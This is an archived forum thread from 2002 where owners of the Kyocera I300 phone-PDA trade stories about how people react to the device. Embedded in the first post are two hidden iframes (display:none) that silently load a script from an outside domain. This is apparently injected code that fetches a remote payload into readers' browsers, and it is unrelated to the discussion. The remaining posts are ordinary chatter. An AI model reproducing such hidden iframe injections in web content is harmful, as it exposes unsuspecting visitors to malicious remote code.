Poll: How do your friends/co-workers respond to your I300?

+ Reply to Thread

Question How do your friends/co-workers respond to your I300?

What do your friends/co-workers think when you pull out your I300...or even people that you dont know and happen to comment on the phone...<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Last edited by Stillen_I30; 02-20-2002 at 02:00 AM.

~Kimberly
    Most comment on the size!

My husband tells me I may as well carry around a VCR...

HUMMMPH!

I think the size comment is nothing but ENVY, as most of the time it comes from individuals who have a pager, a phone AND a Palm clipped to their hip, makes me wonder if they left the space suit at home...

GIMME A BREAK!

this thing is great!...greatly outweights the alternative of carrying around multiple gadgetry

(Click a sponser today!)
    I don't hang around with enough "cool" people! Most just give me a "hmmm" when I show it off. I think I need to hang it on a chain around my neck. Ran into a guy who works at Qualcomm who drooled slightly and commented the they had a chip inside (sure enough, there's their sticker on the back). I don't really care - I know it's cool!!
    Gary

when I came into a meeting when I first got my I300, it was a huge it.... now there are 5 of us here with I300's....

Brooks

Talking It's definitely envy

When I show people at work all the cool stuff I have loaded on my I300...they say "Geez, does it wipe your ass too?"

They all come to me for info they need that I have loaded on my I300 though.

Laurie

some praise & envy

I usually whip it out at places where I'm waiting on something (food, service, etc.) to play a game.
    When this occurs, people think I'm showing off. It's hard to be discrete because the screen is larger and brighter than most cell phone on the market. It's wierd because when other folks get excited to show off their new PDA or cell phone, I don't tell them about my I300. Don't want to take anyone's thunder.
    My girlfriend can't believe how much use I can make of it.
    For the most part, people like it.
    I think it should be called an UDA (Ultimate Digital Assistant)....or <yoo-dah>

Most people that I have come across have just been surprised that something like this is out there.

They seem to be most taken with the fact that I can surf the web, send and receive email, play games, etc.

One lady wanted to know if she could use it to turn on the lights in her home or start her car. I told here that I did not know, but I am sure one day.....

Most others just think of me as a rara avis.

Cogito ergo sum.
    Si hoc Legere Scis Nimium Eruditionis habes.

(Click a sponser today!)
    I was in Fry's the other day browsing for whatever goodies I could find for my I300 and I overheard a gentleman tell his father "Boy, I wish someone would come out with a single device so I didn't have to carry a Palm, a phone, and a pager all strapped to my body."

TaDa!! Captain I300 to the rescue!! I whipped mine out, flipped the cover open expertly with my thumb and watched his eyes get brighter than my screen with the contrast set to "t". I put the 300 through it's paces and could have sold him mine on the spot, except he's a long time Verizon user with lots of credits to his credit (?), so I had to tell him to be a little patient. Aaaaany Daaay now.
    Gary

Administrator

Arrow

i keep mine hidden from view... no one knows i have it... (evil grin...)

(Click a sponser today!)
    Originally posted by Marctronixx
    i keep mine hidden from view... no one knows i have it... (evil grin...)

Yeah, Riiiiight.:p
    Gary

Mostly, my husband gets oooohs and aaaaaahs over his I300. I don't think there are very many in Flagstaff. But, he doesn't have very many programs on his.

I, on the other hand, am always trying new stuff out on my 6035. All of my friends and family think that I am a great big dork! Palm geek extrordinaire! Especially when I have my headset in place. However, whenever they need info, guess who they call?

PS Do any of you get attitude when you wear your headset? My husband won't go anywhere with me when I am wearing mine.